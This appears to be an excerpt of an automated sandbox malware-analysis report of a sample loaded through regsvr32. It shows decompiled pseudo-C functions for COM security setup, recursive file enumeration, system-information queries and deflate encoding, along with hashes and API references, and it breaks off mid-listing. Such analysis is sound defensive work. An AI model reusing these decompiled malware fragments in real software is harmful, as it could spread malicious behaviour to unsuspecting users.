            0x009a6ba6
            0x00000000
            0x00000000
            0x009a6c5a
            0x00000000
            0x00000000
            0x009a6c63
            0x009a6c66
            0x009a6c76
            0x009a6c76
            0x009a6bac
            0x009a6baf
            0x009a6c0b
            0x009a6bc5
            0x009a6bc5
            0x009a6bcb
            0x009a6bd1
            0x009a6c82
            0x009a6c86
            0x009a6c88
            0x009a6c8e
            0x00000000
            0x00000000
            0x009a6c94
            0x009a6c9b
            0x009a6cbd
            0x009a6cc3
            0x009a6cef
            0x009a6cf3
            0x009a6cf5
            0x009a6cf7
            0x009a6cf7
            0x009a6cf7
            0x009a6cfb
            0x009a6cfb
            0x009a6cc5
            0x009a6ccb
            0x009a6ccd
            0x009a6cd1
            0x009a6cd3
            0x009a6cd5
            0x009a6cd5
            0x009a6cd5
            0x009a6cd7
            0x009a6cdb
            0x009a6ce1
            0x009a6ce3
            0x009a6ce5
            0x009a6ce5
            0x009a6ce5
            0x009a6ce9
            0x009a6ce9
            0x009a6ce1
            0x009a6cd1
            0x009a6c9d
            0x009a6c9f
            0x009a6ca3
            0x009a6ca5
            0x009a6ca7
            0x009a6ca7
            0x009a6ca7
            0x009a6cab
            0x009a6cab
            0x009a6ca3
            0x009a6cfd
            0x009a6cff
            0x009a6cff
            0x009a6cff
            0x009a6d01
            0x009a6d05
            0x00000000
            0x009a6d05
            0x009a6bdb
            0x009a6bdd
            0x009a6be2
            0x009a6bea
            0x009a6bed
            0x009a6bf0
            0x009a6bf6
            0x009a6bf6
            0x009a6bf6
            0x009a6bf8
            0x009a6bfc
            0x00000000
            0x009a6c13
            0x009a6c13
            0x009a6c16
            0x009a6c18
            0x009a6c1b
            0x009a6c1e
            0x009a6c21
            0x009a6c24
            0x009a6c27
            0x009a6c27
            0x009a6c27
            0x009a6c29
            0x009a6b32
            0x009a6b36
            0x00000000
            0x00000000
            0x00000000
            0x009a6b36
            0x009a6c0b
            0x009a6bb1
            0x009a6bb4
            0x009a6bb7
            0x009a6bba
            0x009a6bc3
            0x00000000
            0x009a6bc3
            0x009a6b2e
            0x009a6b31
            0x00000000
            0x009a6b3c
            0x009a6b3c
            0x00000000
            0x009a6b42

            Strings
            Memory Dump Source
            • Source File: 00000003.00000002.269120079.0000000000990000.00000040.00000800.00020000.00000000.sdmp, Offset: 00990000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_3_2_990000_regsvr32.jbxd
            Yara matches
            Similarity
            • API ID:
            • String ID: Genu$ineI$invalid distance code$invalid distance too far back$invalid literal/length code$ntel
            • API String ID: 0-3089872807
            • Opcode ID: 6a27a5da892aacde48c403040a706c543587054b0fd14b22174bbe56452f1893
            • Instruction ID: 4a899ee0a99f424ea128c5c6f8cf3f51a2785f9298887ea82def428c131afb1a
            • Opcode Fuzzy Hash: 6a27a5da892aacde48c403040a706c543587054b0fd14b22174bbe56452f1893
            • Instruction Fuzzy Hash: 0A12F132A083518FCB15DE3CC99422ABBE1EB86354F1D8A2DE895D7B41D375AD48C7C1
            Uniqueness

            Uniqueness Score: -1.00%

            Function 0099E485 Relevance: 7.6, APIs: 5, Instructions: 87commemoryCOMMON
            Download Yara Rule
            C-Code - Quality: 30%
            			E0099E485(void* __ecx) {
				char _v8;
				void* _v12;
				char* _t15;
				intOrPtr* _t16;
				void* _t21;
				intOrPtr* _t23;
				intOrPtr* _t24;
				intOrPtr* _t25;
				void* _t30;
				void* _t33;

				_v12 = 0;
				_v8 = 0;
				__imp__CoInitializeEx(0, 0, _t30, _t33, __ecx, __ecx);
				__imp__CoInitializeSecurity(0, 0xffffffff, 0, 0, 0, 3, 0, 0, 0);
				_t15 =  &_v12;
				__imp__CoCreateInstance(0x9ac8a0, 0, 1, 0x9ac8b0, _t15);
				if(_t15 < 0) {
					L5:
					_t23 = _v8;
					if(_t23 != 0) {
						 *((intOrPtr*)( *_t23 + 8))(_t23);
					}
					_t24 = _v12;
					if(_t24 != 0) {
						 *((intOrPtr*)( *_t24 + 8))(_t24);
					}
					_t16 = 0;
				} else {
					__imp__#2(__ecx);
					_t25 = _v12;
					_t21 =  *((intOrPtr*)( *_t25 + 0xc))(_t25, _t15, 0, 0, 0, 0, 0, 0,  &_v8);
					if(_t21 < 0) {
						goto L5;
					} else {
						__imp__CoSetProxyBlanket(_v8, 0xa, 0, 0, 3, 3, 0, 0);
						if(_t21 < 0) {
							goto L5;
						} else {
							_t16 = E00998DC9(8);
							if(_t16 == 0) {
								goto L5;
							} else {
								 *((intOrPtr*)(_t16 + 4)) = _v12;
								 *_t16 = _v8;
							}
						}
					}
				}
				return _t16;
			}













            0x0099e492
            0x0099e495
            0x0099e498
            0x0099e4a9
            0x0099e4af
            0x0099e4c0
            0x0099e4c8
            0x0099e519
            0x0099e519
            0x0099e51e
            0x0099e523
            0x0099e523
            0x0099e526
            0x0099e52b
            0x0099e530
            0x0099e530
            0x0099e533
            0x0099e4ca
            0x0099e4cb
            0x0099e4d1
            0x0099e4e2
            0x0099e4e7
            0x00000000
            0x0099e4e9
            0x0099e4f6
            0x0099e4fe
            0x00000000
            0x0099e500
            0x0099e502
            0x0099e50a
            0x00000000
            0x0099e50c
            0x0099e50f
            0x0099e515
            0x0099e515
            0x0099e50a
            0x0099e4fe
            0x0099e4e7
            0x0099e538

            APIs
            • CoInitializeEx.OLE32(00000000,00000000,00000000,00000000,00000000,00000000,?,0099E7B4,00000E16,00000000,00000000,00000005), ref: 0099E498
            • CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000,?,0099E7B4,00000E16,00000000,00000000,00000005), ref: 0099E4A9
            • CoCreateInstance.OLE32(009AC8A0,00000000,00000001,009AC8B0,00000000,?,0099E7B4,00000E16,00000000,00000000,00000005), ref: 0099E4C0
            • SysAllocString.OLEAUT32(00000000), ref: 0099E4CB
            • CoSetProxyBlanket.OLE32(00000005,0000000A,00000000,00000000,00000003,00000003,00000000,00000000,?,0099E7B4,00000E16,00000000,00000000,00000005), ref: 0099E4F6
              • Part of subcall function 00998DC9: RtlAllocateHeap.NTDLL(00000008,?,?,00999793,00000100,?,0099661B), ref: 00998DD7
            Memory Dump Source
            • Source File: 00000003.00000002.269120079.0000000000990000.00000040.00000800.00020000.00000000.sdmp, Offset: 00990000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_3_2_990000_regsvr32.jbxd
            Yara matches
            Similarity
            • API ID: Initialize$AllocAllocateBlanketCreateHeapInstanceProxySecurityString
            • String ID:
            • API String ID: 1610782348-0
            • Opcode ID: b11dac799378d784e10c69c2848dc5d95a3a952e050000e8dc528ce56fe12435
            • Instruction ID: 97ccaf703b94ea423cff6da06a37c967929b9af15eda3c7ed7ea124e0eb7fc12
            • Opcode Fuzzy Hash: b11dac799378d784e10c69c2848dc5d95a3a952e050000e8dc528ce56fe12435
            • Instruction Fuzzy Hash: CB212570614245BBEB248B6ADC4DE6BBF7CEFC3B18F11005CF505AA290DA70DA40DAB0
            Uniqueness

            Uniqueness Score: -1.00%

            Function 0099C123 Relevance: 3.1, APIs: 2, Instructions: 105fileCOMMON
            Download Yara Rule
            C-Code - Quality: 78%
            			E0099C123(void* __ecx, void* __fp0, intOrPtr _a16) {
				char _v12;
				WCHAR* _v16;
				struct _WIN32_FIND_DATAW _v608;
				WCHAR* _t24;
				intOrPtr _t31;
				intOrPtr _t41;
				void* _t45;
				intOrPtr _t46;
				void* _t48;
				intOrPtr _t54;
				void* _t59;
				char _t60;
				void* _t61;
				void* _t62;
				void* _t63;
				void* _t75;

				_t75 = __fp0;
				_push(0);
				_t48 = __ecx;
				_push(L"\\*");
				_t24 = E00999C50(__ecx);
				_t63 = _t62 + 0xc;
				_v16 = _t24;
				if(_t24 == 0) {
					return _t24;
				}
				_t59 = FindFirstFileW(_t24,  &_v608);
				if(_t59 == 0xffffffff) {
					L14:
					return E00998DDF( &_v16, 0xfffffffe);
				} else {
					goto L2;
				}
				do {
					L2:
					if(E0099C0FB( &(_v608.cFileName)) != 0) {
						goto L12;
					}
					if((_v608.dwFileAttributes & 0x00000010) != 0) {
						L10:
						_push(0);
						_push( &(_v608.cFileName));
						_push(0x9ac9d8);
						_t60 = E00999C50(_t48);
						_t63 = _t63 + 0x10;
						_v12 = _t60;
						if(_t60 != 0) {
							_t54 =  *0x9af8d0; // 0x452f8c0
							 *((intOrPtr*)(_t54 + 0xc0))(1);
							_push(1);
							_push(1);
							_push(0);
							E0099C123(_t60, _t75, 1, 5, E009A017A, _a16);
							_t63 = _t63 + 0x1c;
							E00998DDF( &_v12, 0xfffffffe);
						}
						goto L12;
					}
					_t61 = 0;
					do {
						_t7 = _t61 + 0x9af9dc; // 0x0
						_push( *_t7);
						_push( &(_v608.cFileName));
						_t41 =  *0x9af8dc; // 0x452fb90
						if( *((intOrPtr*)(_t41 + 0x18))() == 0) {
							goto L8;
						}
						_t45 = E009A017A(_t75, _t48,  &_v608, _a16);
						_t63 = _t63 + 0xc;
						if(_t45 == 0) {
							break;
						}
						_t46 =  *0x9af8d0; // 0x452f8c0
						 *((intOrPtr*)(_t46 + 0xc0))(1);
						L8:
						_t61 = _t61 + 4;
					} while (_t61 < 4);
					if((_v608.dwFileAttributes & 0x00000010) == 0) {
						goto L12;
					}
					goto L10;
					L12:
				} while (FindNextFileW(_t59,  &_v608) != 0);
				_t31 =  *0x9af8d0; // 0x452f8c0
				 *((intOrPtr*)(_t31 + 0x80))(_t59);
				goto L14;
			}



















            0x0099c123
            0x0099c12f
            0x0099c131
            0x0099c133
            0x0099c139
            0x0099c13e
            0x0099c141
            0x0099c146
            0x0099c262
            0x0099c262
            0x0099c15a
            0x0099c15f
            0x0099c251
            0x00000000
            0x00000000
            0x00000000
            0x00000000
            0x0099c165
            0x0099c165
            0x0099c172
            0x00000000
            0x00000000
            0x0099c180
            0x0099c1d3
            0x0099c1d3
            0x0099c1db
            0x0099c1dc
            0x0099c1e7
            0x0099c1e9
            0x0099c1ec
            0x0099c1f1
            0x0099c1f3
            0x0099c1fb
            0x0099c201
            0x0099c203
            0x0099c205
            0x0099c21a
            0x0099c21f
            0x0099c228
            0x0099c22e
            0x00000000
            0x0099c1f1
            0x0099c182
            0x0099c184
            0x0099c184
            0x0099c184
            0x0099c190
            0x0099c191
            0x0099c19b
            0x00000000
            0x00000000
            0x0099c1a8
            0x0099c1ad
            0x0099c1b2
            0x00000000
            0x00000000
            0x0099c1b4
            0x0099c1bb
            0x0099c1c1
            0x0099c1c1
            0x0099c1c4
            0x0099c1d1
            0x00000000
            0x00000000
            0x00000000
            0x0099c22f
            0x0099c23d
            0x0099c245
            0x0099c24b
            0x00000000

            APIs
            • FindFirstFileW.KERNEL32(00000000,?,?,00000000,00000000), ref: 0099C154
            • FindNextFileW.KERNEL32(00000000,?), ref: 0099C237
            Memory Dump Source
            • Source File: 00000003.00000002.269120079.0000000000990000.00000040.00000800.00020000.00000000.sdmp, Offset: 00990000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_3_2_990000_regsvr32.jbxd
            Yara matches
            Similarity
            • API ID: FileFind$FirstNext
            • String ID:
            • API String ID: 1690352074-0
            • Opcode ID: b6974015fa785af7ad3ded1e62512b98e3f2794153cf9608756a7d11c4aaa7e2
            • Instruction ID: 79dcd2d7ae7981d41500b9fd42a6e8b4e139a073f08c5fcf1344471199398d04
            • Opcode Fuzzy Hash: b6974015fa785af7ad3ded1e62512b98e3f2794153cf9608756a7d11c4aaa7e2
            • Instruction Fuzzy Hash: 1731C8B1A442146FEF20ABACDC89FAB37ACEF85710F140065F919E71C1EA71DD408BA4
            Uniqueness

            Uniqueness Score: -1.00%

            Function 0099A1F8 Relevance: 1.5, APIs: 1, Instructions: 24timeCOMMON
            Download Yara Rule
            APIs
            • GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,0099521F,?,?,?,?,?,?,?,?,00000000,00000000,00000000), ref: 0099A205
            Memory Dump Source
            • Source File: 00000003.00000002.269120079.0000000000990000.00000040.00000800.00020000.00000000.sdmp, Offset: 00990000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_3_2_990000_regsvr32.jbxd
            Yara matches
            Similarity
            • API ID: Time$FileSystem
            • String ID:
            • API String ID: 2086374402-0
            • Opcode ID: baccee778901827a87bf47f32db76349890a2f2edf4e832c55f1e7d0fdce50be
            • Instruction ID: 1d8968af92f81529dfc05e72aac0edbd395f5d4be7ab0240c749229c34bd4c8e
            • Opcode Fuzzy Hash: baccee778901827a87bf47f32db76349890a2f2edf4e832c55f1e7d0fdce50be
            • Instruction Fuzzy Hash: 43E04875D003146FDB10AF689D09B5AB7BDEBC1B10F118555AC41B3344E570AE0486D1
            Uniqueness

            Uniqueness Score: -1.00%

            Function 0099DDE7 Relevance: 1.5, APIs: 1, Instructions: 15COMMON
            Download Yara Rule
            C-Code - Quality: 100%
            			E0099DDE7(void* __ecx) {
				struct _SYSTEM_INFO _v40;
				void* _t5;

				if(__ecx == 0) {
					GetSystemInfo( &_v40);
					return _v40.dwOemId & 0x0000ffff;
				} else {
					_t5 = 9;
					return _t5;
				}
			}





            0x0099ddef
            0x0099ddfa
            0x0099de05
            0x0099ddf1
            0x0099ddf3
            0x0099ddf5
            0x0099ddf5

            APIs
            • GetSystemInfo.KERNEL32(?,?,?,?,?,?,?,?,?,0099E1C0), ref: 0099DDFA
            Memory Dump Source
            • Source File: 00000003.00000002.269120079.0000000000990000.00000040.00000800.00020000.00000000.sdmp, Offset: 00990000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_3_2_990000_regsvr32.jbxd
            Yara matches
            Similarity
            • API ID: InfoSystem
            • String ID:
            • API String ID: 31276548-0
            • Opcode ID: 5c51d6c3c069d6a8a4bdcc3c441be99fc0e23bd944d967e713ebb62605ddc4f4
            • Instruction ID: a06237f877a188b93aac57b45b2fbe79becadf7eba73da9600e67ccba9307c40
            • Opcode Fuzzy Hash: 5c51d6c3c069d6a8a4bdcc3c441be99fc0e23bd944d967e713ebb62605ddc4f4
            • Instruction Fuzzy Hash: 81C08071A1521F57CF149BA9B9566EF73FC5F44689F100455ED03F14C1E960DD4143B0
            Uniqueness

            Uniqueness Score: -1.00%

            Function 009A82A0 Relevance: .4, Instructions: 359COMMONCrypto
            Download Yara Rule
            C-Code - Quality: 99%
            			E009A82A0(intOrPtr _a4, signed int _a8, signed int _a12) {
				signed int _v8;
				signed short* _v12;
				char _v16;
				signed short _v20;
				unsigned int _v24;
				signed short _v28;
				signed int _t223;
				signed int _t235;
				signed int _t237;
				signed short _t240;
				signed int _t241;
				signed short _t244;
				signed int _t245;
				signed short _t248;
				signed int _t249;
				signed int _t250;
				void* _t254;
				signed char _t259;
				signed int _t275;
				signed int _t289;
				signed int _t308;
				signed short _t316;
				signed int _t321;
				void* _t329;
				signed short _t330;
				signed short _t333;
				signed short _t334;
				signed short _t343;
				signed short _t346;
				signed short _t347;
				signed short _t348;
				signed short _t358;
				signed short _t361;
				signed short _t362;
				signed short _t363;
				signed short _t370;
				signed int _t373;
				signed int _t378;
				signed short _t379;
				signed short _t382;
				unsigned int _t388;
				unsigned short _t390;
				unsigned short _t392;
				unsigned short _t394;
				signed int _t396;
				signed int _t397;
				signed int _t398;
				signed int _t400;
				signed short _t401;
				signed int _t402;
				signed int _t403;
				signed int _t407;
				signed int _t409;

				_t223 = _a8;
				_t235 =  *(_t223 + 2) & 0x0000ffff;
				_push(_t397);
				_t388 = 0;
				_t398 = _t397 | 0xffffffff;
				if(_a12 < 0) {
					L42:
					return _t223;
				} else {
					_t329 =  !=  ? 7 : 0x8a;
					_v12 = _t223 + 6;
					_t254 = (0 | _t235 != 0x00000000) + 3;
					_v16 = _a12 + 1;
					do {
						_v24 = _t388;
						_t388 = _t388 + 1;
						_a8 = _t235;
						_a12 = _t235;
						_v8 =  *_v12 & 0x0000ffff;
						_t223 = _a4;
						if(_t388 >= _t329) {
							L4:
							if(_t388 >= _t254) {
								if(_a8 == 0) {
									_t122 = _t223 + 0x16bc; // 0x5d08408b
									_t400 =  *_t122;
									if(_t388 > 0xa) {
										_t168 = _t223 + 0xac4; // 0xfeacb58c
										_t330 =  *_t168 & 0x0000ffff;
										_t169 = _t223 + 0xac6; // 0xfffffeac
										_t237 =  *_t169 & 0x0000ffff;
										_v24 = _t330;
										_t171 = _t223 + 0x16b8; // 0x5750038
										_t333 = (_t330 << _t400 |  *_t171) & 0x0000ffff;
										_v28 = _t333;
										if(_t400 <= 0x10 - _t237) {
											_t259 = _t400 + _t237;
										} else {
											_t173 = _t223 + 0x14; // 0xc703f045
											 *(_t223 + 0x16b8) = _t333;
											_t175 = _t223 + 8; // 0x8d000040
											 *((char*)( *_t175 +  *_t173)) = _v28;
											_t223 = _a4;
											 *((intOrPtr*)(_t223 + 0x14)) =  *((intOrPtr*)(_t223 + 0x14)) + 1;
											_t181 = _t223 + 0x14; // 0xc703f045
											_t182 = _t223 + 8; // 0x8d000040
											_t183 = _t223 + 0x16b9; // 0x8b057500
											 *((char*)( *_t181 +  *_t182)) =  *_t183;
											 *((intOrPtr*)(_t223 + 0x14)) =  *((intOrPtr*)(_t223 + 0x14)) + 1;
											_t333 = _v24 >> 0x10;
											_t189 = _t223 + 0x16bc; // 0x5d08408b
											_t259 =  *_t189 + 0xfffffff0 + _t237;
										}
										_t334 = _t333 & 0x0000ffff;
										 *(_t223 + 0x16bc) = _t259;
										 *(_t223 + 0x16b8) = _t334;
										_t401 = _t334 & 0x0000ffff;
										if(_t259 <= 9) {
											_t209 = _t388 - 0xb; // -10
											 *(_t223 + 0x16b8) = _t209 << _t259 | _t401;
											 *(_t223 + 0x16bc) = _t259 + 7;
										} else {
											_t193 = _t223 + 8; // 0x8d000040
											_t390 = _t388 + 0xfffffff5;
											_t194 = _t223 + 0x14; // 0xc703f045
											_t240 = _t390 << _t259 | _t401;
											 *(_t223 + 0x16b8) = _t240;
											 *( *_t193 +  *_t194) = _t240;
											 *((intOrPtr*)(_t223 + 0x14)) =  *((intOrPtr*)(_t223 + 0x14)) + 1;
											_t199 = _t223 + 0x14; // 0xc703f045
											_t200 = _t223 + 8; // 0x8d000040
											_t201 = _t223 + 0x16b9; // 0x8b057500
											 *((char*)( *_t199 +  *_t200)) =  *_t201;
											 *((intOrPtr*)(_t223 + 0x14)) =  *((intOrPtr*)(_t223 + 0x14)) + 1;
											 *(_t223 + 0x16bc) =  *(_t223 + 0x16bc) + 0xfffffff7;
											 *(_t223 + 0x16b8) = _t390 >> 0x10;
										}
										goto L35;
									}
									_t123 = _t223 + 0xac0; // 0x3fc458b
									_t343 =  *_t123 & 0x0000ffff;
									_t124 = _t223 + 0xac2; // 0xb58c03fc
									_t241 =  *_t124 & 0x0000ffff;
									_v24 = _t343;
									_t126 = _t223 + 0x16b8; // 0x5750038
									_t346 = (_t343 << _t400 |  *_t126) & 0x0000ffff;
									_v28 = _t346;
									if(_t400 > 0x10 - _t241) {
										_t128 = _t223 + 0x14; // 0xc703f045
										 *(_t223 + 0x16b8) = _t346;
										_t130 = _t223 + 8; // 0x8d000040
										 *((char*)( *_t130 +  *_t128)) = _v28;
										_t223 = _a4;
										 *((intOrPtr*)(_t223 + 0x14)) =  *((intOrPtr*)(_t223 + 0x14)) + 1;
										_t136 = _t223 + 0x14; // 0xc703f045
										_t137 = _t223 + 8; // 0x8d000040
										_t138 = _t223 + 0x16b9; // 0x8b057500
										 *((char*)( *_t136 +  *_t137)) =  *_t138;
										_t142 = _t223 + 0x16bc; // 0x5d08408b
										 *((intOrPtr*)(_t223 + 0x14)) =  *((intOrPtr*)(_t223 + 0x14)) + 1;
										_t346 = _v24 >> 0x10;
										_t400 =  *_t142 + 0xfffffff0;
									}
									_t403 = _t400 + _t241;
									_t347 = _t346 & 0x0000ffff;
									 *(_t223 + 0x16bc) = _t403;
									 *(_t223 + 0x16b8) = _t347;
									_t348 = _t347 & 0x0000ffff;
									if(_t403 <= 0xd) {
										_t163 = _t403 + 3; // 0x5d08408e
										_t275 = _t163;
										L28:
										 *(_t223 + 0x16bc) = _t275;
										_t165 = _t388 - 3; // -2
										_t166 = _t223 + 0x16b8; // 0x5750038
										 *(_t223 + 0x16b8) = (_t165 << _t403 |  *_t166 & 0x0000ffff) & 0x0000ffff;
									} else {
										_t392 = _t388 + 0xfffffffd;
										_t147 = _t223 + 0x14; // 0xc703f045
										_t244 = _t392 << _t403 | _t348;
										_t148 = _t223 + 8; // 0x8d000040
										 *(_t223 + 0x16b8) = _t244;
										 *( *_t148 +  *_t147) = _t244;
										 *((intOrPtr*)(_t223 + 0x14)) =  *((intOrPtr*)(_t223 + 0x14)) + 1;
										_t153 = _t223 + 0x14; // 0xc703f045
										_t154 = _t223 + 8; // 0x8d000040
										_t155 = _t223 + 0x16b9; // 0x8b057500
										 *((char*)( *_t153 +  *_t154)) =  *_t155;
										 *((intOrPtr*)(_t223 + 0x14)) =  *((intOrPtr*)(_t223 + 0x14)) + 1;
										 *(_t223 + 0x16bc) =  *(_t223 + 0x16bc) + 0xfffffff3;
										 *(_t223 + 0x16b8) = _t392 >> 0x00000010 & 0x0000ffff;
									}
									goto L35;
								}
								_t289 = _a12;
								if(_t289 != _t398) {
									_t53 = _t289 * 4; // 0xfffffeac
									_t396 =  *(_t223 + _t53 + 0xa7e) & 0x0000ffff;
									_t56 = _t235 * 4; // 0xfeac8d94
									_t370 =  *(_t223 + _t56 + 0xa7c) & 0x0000ffff;
									_t58 = _t223 + 0x16bc; // 0x5d08408b
									_t407 =  *_t58;
									_v28 = _t370;
									_t60 = _t223 + 0x16b8; // 0x5750038
									_t249 = (_t370 << _t407 |  *_t60) & 0x0000ffff;
									if(_t407 <= 0x10 - _t396) {
										_t373 = _t249;
										_t308 = _t407 + _t396;
									} else {
										_t61 = _t223 + 0x14; // 0xc703f045
										_t62 = _t223 + 8; // 0x8d000040
										 *(_t223 + 0x16b8) = _t249;
										 *( *_t62 +  *_t61) = _t249;
										 *((intOrPtr*)(_t223 + 0x14)) =  *((intOrPtr*)(_t223 + 0x14)) + 1;
										_t67 = _t223 + 0x14; // 0xc703f045
										_t68 = _t223 + 8; // 0x8d000040
										_t69 = _t223 + 0x16b9; // 0x8b057500
										 *((char*)( *_t67 +  *_t68)) =  *_t69;
										 *((intOrPtr*)(_t223 + 0x14)) =  *((intOrPtr*)(_t223 + 0x14)) + 1;
										_t75 = _t223 + 0x16bc; // 0x5d08408b
										_t373 = _v28 >> 0x00000010 & 0x0000ffff;
										_t308 =  *_t75 + 0xfffffff0 + _t396;
									}
									_t388 = _v24;
									 *(_t223 + 0x16bc) = _t308;
									 *(_t223 + 0x16b8) = _t373;
								}
								_t80 = _t223 + 0xabc; // 0xc80bc323
								_t358 =  *_t80 & 0x0000ffff;
								_t81 = _t223 + 0x16bc; // 0x5d08408b
								_t402 =  *_t81;
								_t82 = _t223 + 0xabe; // 0x458bc80b
								_t245 =  *_t82 & 0x0000ffff;
								_v24 = _t358;
								_t84 = _t223 + 0x16b8; // 0x5750038
								_t361 = (_t358 << _t402 |  *_t84) & 0x0000ffff;
								_v28 = _t361;
								if(_t402 > 0x10 - _t245) {
									_t86 = _t223 + 0x14; // 0xc703f045
									 *(_t223 + 0x16b8) = _t361;
									_t88 = _t223 + 8; // 0x8d000040
									 *((char*)( *_t88 +  *_t86)) = _v28;
									_t223 = _a4;
									 *((intOrPtr*)(_t223 + 0x14)) =  *((intOrPtr*)(_t223 + 0x14)) + 1;
									_t94 = _t223 + 0x14; // 0xc703f045
									_t95 = _t223 + 8; // 0x8d000040
									_t96 = _t223 + 0x16b9; // 0x8b057500
									 *((char*)( *_t94 +  *_t95)) =  *_t96;
									_t100 = _t223 + 0x16bc; // 0x5d08408b
									 *((intOrPtr*)(_t223 + 0x14)) =  *((intOrPtr*)(_t223 + 0x14)) + 1;
									_t361 = _v24 >> 0x10;
									_t402 =  *_t100 + 0xfffffff0;
								}
								_t403 = _t402 + _t245;
								_t362 = _t361 & 0x0000ffff;
								 *(_t223 + 0x16bc) = _t403;
								 *(_t223 + 0x16b8) = _t362;
								_t363 = _t362 & 0x0000ffff;
								if(_t403 <= 0xe) {
									_t121 = _t403 + 2; // 0x5d08408d
									_t275 = _t121;
									goto L28;
								} else {
									_t394 = _t388 + 0xfffffffd;
									_t105 = _t223 + 0x14; // 0xc703f045
									_t248 = _t394 << _t403 | _t363;
									_t106 = _t223 + 8; // 0x8d000040
									 *(_t223 + 0x16b8) = _t248;
									 *( *_t106 +  *_t105) = _t248;
									 *((intOrPtr*)(_t223 + 0x14)) =  *((intOrPtr*)(_t223 + 0x14)) + 1;
									_t111 = _t223 + 0x14; // 0xc703f045
									_t112 = _t223 + 8; // 0x8d000040
									_t113 = _t223 + 0x16b9; // 0x8b057500
									 *((char*)( *_t111 +  *_t112)) =  *_t113;
									 *((intOrPtr*)(_t223 + 0x14)) =  *((intOrPtr*)(_t223 + 0x14)) + 1;
									 *(_t223 + 0x16bc) =  *(_t223 + 0x16bc) + 0xfffffff2;
									 *(_t223 + 0x16b8) = _t394 >> 0x00000010 & 0x0000ffff;
									goto L35;
								}
							} else {
								_t316 = _t223 + (_t235 + 0x29f) * 4;
								_v28 = _t316;
								do {
									_t378 = _a12;
									_t22 = _t223 + 0x16bc; // 0x5d08408b
									_t409 =  *_t22;
									_t24 = _t378 * 4; // 0xfffffeac
									_t250 =  *(_t223 + _t24 + 0xa7e) & 0x0000ffff;
									_t379 =  *_t316 & 0x0000ffff;
									_v24 = _t379;
									_t27 = _t223 + 0x16b8; // 0x5750038
									_t382 = (_t379 << _t409 |  *_t27) & 0x0000ffff;
									_v20 = _t382;
									if(_t409 <= 0x10 - _t250) {
										_t321 = _t409 + _t250;
									} else {
										_t29 = _t223 + 0x14; // 0xc703f045
										 *(_t223 + 0x16b8) = _t382;
										_t31 = _t223 + 8; // 0x8d000040
										 *((char*)( *_t31 +  *_t29)) = _v20;
										_t223 = _a4;
										 *((intOrPtr*)(_t223 + 0x14)) =  *((intOrPtr*)(_t223 + 0x14)) + 1;
										_t37 = _t223 + 0x14; // 0xc703f045
										_t38 = _t223 + 8; // 0x8d000040
										_t39 = _t223 + 0x16b9; // 0x8b057500
										 *((char*)( *_t37 +  *_t38)) =  *_t39;
										 *((intOrPtr*)(_t223 + 0x14)) =  *((intOrPtr*)(_t223 + 0x14)) + 1;
										_t382 = _v24 >> 0x10;
										_t45 = _t223 + 0x16bc; // 0x5d08408b
										_t321 =  *_t45 + 0xfffffff0 + _t250;
									}
									 *(_t223 + 0x16bc) = _t321;
									_t316 = _v28;
									 *(_t223 + 0x16b8) = _t382 & 0x0000ffff;
									_t388 = _t388 - 1;
								} while (_t388 != 0);
								L35:
								_t235 = _v8;
								_t388 = 0;
								_t398 = _a12;
								if(_t235 != 0) {
									if(_a8 != _t235) {
										_t329 = 7;
										_t217 = _t329 - 3; // 0x4
										_t254 = _t217;
									} else {
										_t329 = 6;
										_t216 = _t329 - 3; // 0x3
										_t254 = _t216;
									}
								} else {
									_t329 = 0x8a;
									_t214 = _t388 + 3; // 0x3
									_t254 = _t214;
								}
								goto L41;
							}
						}
						_t223 = _a4;
						if(_t235 == _v8) {
							_t235 = _v8;
							goto L41;
						}
						goto L4;
						L41:
						_v12 =  &(_v12[2]);
						_t221 =  &_v16;
						 *_t221 = _v16 - 1;
					} while ( *_t221 != 0);
					goto L42;
				}
			}
























































            0x009a82a3
            0x009a82aa
            0x009a82ae
            0x009a82b0
            0x009a82b2
            0x009a82b8
            0x009a87a5
            0x009a87ab
            0x009a82be
            0x009a82ca
            0x009a82d7
            0x009a82da
            0x009a82e1
            0x009a82e4
            0x009a82e7
            0x009a82ea
            0x009a82eb
            0x009a82ee
            0x009a82f4
            0x009a82f7
            0x009a82fc
            0x009a830c
            0x009a830e
            0x009a83c4
            0x009a8553
            0x009a8553
            0x009a855c
            0x009a866f
            0x009a866f
            0x009a8676
            0x009a8676
            0x009a867f
            0x009a868c
            0x009a8695
            0x009a8698
            0x009a869d
            0x009a86e5
            0x009a869f
            0x009a869f
            0x009a86a2
            0x009a86a9
            0x009a86af
            0x009a86b2
            0x009a86b5
            0x009a86b8
            0x009a86bb
            0x009a86be
            0x009a86c4
            0x009a86d2
            0x009a86d5
            0x009a86d8
            0x009a86e1
            0x009a86e1
            0x009a86e8
            0x009a86eb
            0x009a86f1
            0x009a86f8
            0x009a86fe
            0x009a874c
            0x009a8758
            0x009a875f
            0x009a8700
            0x009a8700
            0x009a8703
            0x009a870c
            0x009a870f
            0x009a8712
            0x009a8719
            0x009a871c
            0x009a871f
            0x009a8722
            0x009a8725
            0x009a872b
            0x009a8736
            0x009a873c
            0x009a8743
            0x009a8743
            0x00000000
            0x009a86fe
            0x009a8562
            0x009a8562
            0x009a8569
            0x009a8569
            0x009a8572
            0x009a857f
            0x009a8588
            0x009a858b
            0x009a8590
            0x009a8592
            0x009a8595
            0x009a859c
            0x009a85a2
            0x009a85a5
            0x009a85a8
            0x009a85ab
            0x009a85ae
            0x009a85b1
            0x009a85b7
            0x009a85c5
            0x009a85cb
            0x009a85ce
            0x009a85d1
            0x009a85d1
            0x009a85d4
            0x009a85d6
            0x009a85d9
            0x009a85df
            0x009a85e6
            0x009a85ec
            0x009a8645
            0x009a8645
            0x009a8648
            0x009a8648
            0x009a864e
            0x009a8656
            0x009a8663
            0x009a85ee
            0x009a85ee
            0x009a85f9
            0x009a85fc
            0x009a85ff
            0x009a8602
            0x009a8609
            0x009a860c
            0x009a860f
            0x009a8612
            0x009a8615
            0x009a861b
            0x009a8627
            0x009a862c
            0x009a8639
            0x009a8639
            0x00000000
            0x009a85ec
            0x009a83ca
            0x009a83cf
            0x009a83d5
